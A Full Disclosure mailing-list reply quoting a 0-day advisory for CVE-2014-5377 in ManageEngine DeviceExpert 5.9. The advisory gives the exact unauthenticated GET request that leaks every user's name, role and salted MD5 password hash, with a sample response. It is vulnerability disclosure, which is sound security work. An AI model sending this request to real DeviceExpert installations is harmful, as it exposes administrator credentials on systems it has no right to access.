On 27 Aug 2014 19:14, "Pedro Ribeiro" <[email protected]> wrote: > > Hi, > > You can read the usernames and MD5 hashed passwords of all the users > in the Device Expert application by sending an unauthenticated > request. > I am releasing this as a 0 day as ManageEngine have responded that > they do not consider this a priority and won't fix it in the near > future unless a customer requests it. See details below. > > >> User credential disclosure in ManageEngine DeviceExpert 5.9 > >> Discovered by Pedro Ribeiro ([email protected]), Agile Information Security > ========================================================================== > > >> Background on the affected product: > "DeviceExpert is a web–based, multi vendor network change, > configuration and compliance management (NCCCM) solution for switches, > routers, firewalls and other network devices. Trusted by thousands of > network administrators around the world, DeviceExpert helps automate > and take total control of the entire life cycle of device > configuration management." > > > >> Technical details: > Vulnerability: User credential disclosure / CVE-2014-5377 > Constraints: no authentication or any other information needed. > Affected versions: UNFIXED as of 27/08/2014 - current version 5.9 > build 5980 is vulnerable, older versions likely vulnerable > > GET /ReadUsersFromMasterServlet > > Example response: > <?xml version="1.0" > encoding="UTF-8"?><discoveryresult><discoverydata><username>admin</username><userrole>Administrator</userrole><password>Ok6/FqR5WtJY5UCLrnvjQQ==</password><emailid> [email protected] </emailid><saltvalue>12345678</saltvalue></discoverydata></discoveryresult> > > The passwords are a salted MD5 hash. > > A copy of this advisory is available at my repo: > https://raw.githubusercontent.com/pedrib/PoC/master/me_deviceexpert-5.txt > > Regards, > Pedro
To clarify, older versions are definitely vulnerable, I just don't know on which versions the vulnerability initially appeared. _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
